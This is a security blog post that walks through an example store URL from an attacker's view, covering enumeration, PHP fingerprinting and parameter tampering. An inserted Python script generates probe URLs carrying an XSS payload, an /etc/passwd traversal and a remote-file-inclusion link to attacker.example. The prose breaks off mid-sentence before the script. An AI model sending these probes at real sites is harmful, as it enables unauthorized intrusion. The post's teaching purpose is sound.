URL from an Attacker's View

Attacker's View of a URL

As a user, who cares what happens in a URL?

... not me (most of the time).

But let's break down the opportunities a URL gives an attacker to learn something, or even to compromise the application, component by component.

http://www.niceguyeddy_.com/secure/store.php?isadmin=0&discount=0.00&msg=%3c%62%3e%53%61%6c%65%21%3c%2f%62%3e&itemID=31337&getPage=sold.php

  • http://: this is a plaintext protocol, offering no privacy and no integrity. Simply put, it is only suitable for loading resources that have no impact on your security; anything that carries a session, credentials or user data belongs on https://.

  • www.: subdomain records can be enumerated (wordlist brute-forcing of DNS, certificate transparency logs, a misconfigured zone transfer) to identify additional servers and services beyond the one in front of you.

  • niceguyeddy_.com: the registrable domain, the primary element in the domain name. From this we can enumerate a wealth of knowledge: WHOIS and DNS records, mail and name servers, the hosting provider, and related domains owned by the same organisation.

  • /secure/: folder(s). Obviously, since we started with http as the protocol, this folder is NOT secure, whatever its name says. We can also run directory brute-forcing tools against the domain to enumerate all the folders, or as many as we have time for.

  • store.php: we now know it is using PHP (now "PHP: Hypertext Preprocessor", originally "Personal Home Page"). This lets us narrow our library of techniques and vulnerabilities to the ones that apply to PHP and the stack it usually sits on. One caveat: extensions can be rewritten or faked, so confirm the technology from response headers and behaviour before discarding anything.

  • Parameters: parameters are passed to the web application mostly to satisfy settings criteria or to select user-specific results. Each one in this URL is an opportunity:

      • ?isadmin=0: a flag that could be vulnerable to manipulation. An attacker would change it to 1 to see whether it changes how the site behaves (is he admin now?). Any value that reaches a database query is additionally an opportunity for SQL injection.

      • &discount=0.00: well, what would happen if that number were larger, and what if it were negative? Exactly what an attacker or AppSec tester would think about.

      • &msg=: that funny-looking code is URL-encoded text; we encode text so that parsers can handle special characters. Take the content of msg and URL-decode it and it reads "<b>Sale!</b>", which is HTML. If the application reflects that value into the page without escaping it, this is vulnerable to cross-site scripting, and potentially other vulnerabilities.

      • &itemID=31337: an identifier presumably looked up server-side. The same questions apply: does a different number return an item you should not see, and is the value used safely in the query?

      • getPage=sold.php: this is 'getting a page', which suggests it loads a file from the server's web folder. An attacker would be interested in path traversal, local file inclusion and remote file inclusion. It could also be vulnerable to
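
To make the breakdown above concrete, here is an added example (not code from the original post) that dissects the URL the same way the bullets do and then generates the single-parameter mutations an attacker would send next. The URL, path and parameter names are the ones from the post; the probe payloads (flipping the flag, a negative discount, a quoted value, a script tag, a traversal path, and a remote file on the hypothetical host attacker.example) are assumptions chosen to illustrate the categories the text names.

```python
"""Dissect a URL the way the post does and list the probes an attacker would
try next.  Added example, not code from the original post; the URL is the
one from the post, the probe payloads are illustrative assumptions."""
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# The exact URL from the post.
URL = ("http://www.niceguyeddy_.com/secure/store.php?isadmin=0&discount=0.00"
       "&msg=%3c%62%3e%53%61%6c%65%21%3c%2f%62%3e&itemID=31337&getPage=sold.php")


def dissect(url):
    """Break a URL into the components the post walks through."""
    parts = urlsplit(url)
    labels = (parts.hostname or "").split(".")
    path_bits = parts.path.split("/")
    return {
        "scheme": parts.scheme,
        "plaintext": parts.scheme == "http",      # no privacy, no integrity
        "subdomain": ".".join(labels[:-2]),       # enumerate for more hosts
        "domain": ".".join(labels[-2:]),          # registrable domain
        "folders": [p for p in path_bits[1:-1] if p],
        "script": path_bits[-1],
        "technology": "php" if path_bits[-1].endswith(".php") else "unknown",
        # parse_qsl percent-decodes values, so msg comes back as HTML.
        "params": dict(parse_qsl(parts.query, keep_blank_values=True)),
    }


def classify(value):
    """Attacker's-eye hints for one decoded parameter value."""
    hints = []
    if value.lstrip("-").replace(".", "", 1).isdigit():
        hints.append("numeric: try larger, negative and quoted values (SQL injection)")
    if value in ("0", "1", "true", "false"):
        hints.append("boolean flag: flip it and watch for a behaviour change")
    if "<" in value and ">" in value:
        hints.append("contains HTML: reflected XSS if echoed unescaped")
    if value.startswith(("/", "./", "../")) or value.endswith((".php", ".html", ".txt")):
        hints.append("looks like a file name: path traversal / LFI / RFI")
    return hints


# One mutation at a time, so any change in behaviour is attributable.
# Payloads are assumptions; attacker.example is a hypothetical host.
PROBES = {
    "isadmin": ["1"],
    "discount": ["100.00", "-10.00", "0.00'"],
    "msg": ["<script>alert(1)</script>"],
    "getPage": ["../../../../etc/passwd", "http://attacker.example/shell.txt"],
}


def probes(url):
    """Return one URL per mutation from PROBES, leaving the other params intact."""
    parts = urlsplit(url)
    base = dict(parse_qsl(parts.query, keep_blank_values=True))
    out = []
    for name, values in PROBES.items():
        for value in values:
            if name in base:
                mutated = dict(base, **{name: value})
                out.append(urlunsplit(parts._replace(query=urlencode(mutated))))
    return out


if __name__ == "__main__":
    info = dissect(URL)
    for key, val in info.items():
        print(f"{key:>11}: {val}")
    for name, val in info["params"].items():
        for hint in classify(val):
            print(f"  {name}={val!r}: {hint}")
    print("\nProbes to send next:")
    for p in probes(URL):
        print(" ", p)
```

Running it prints the decoded components (msg comes back as "<b>Sale!</b>"), a hint per parameter, and seven probe URLs, each differing from the original in exactly one parameter. The one-change-at-a-time rule matters: when a probe changes the response, you want to know which input caused it.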


Considerations

This is just one request, a single GET request, and in theory there is a lot more to discuss than this; the point is really just to get you (the reader) thinking about security. Hackers and security testers will take full advantage of any weakness and rinse it as much as possible. If you are responsible for any web applications or web-facing interfaces, just make sure they have been tested, really tested, and not just given the thumbs up by your developers. They are full-time developers; we are full-time hackers/security consultants.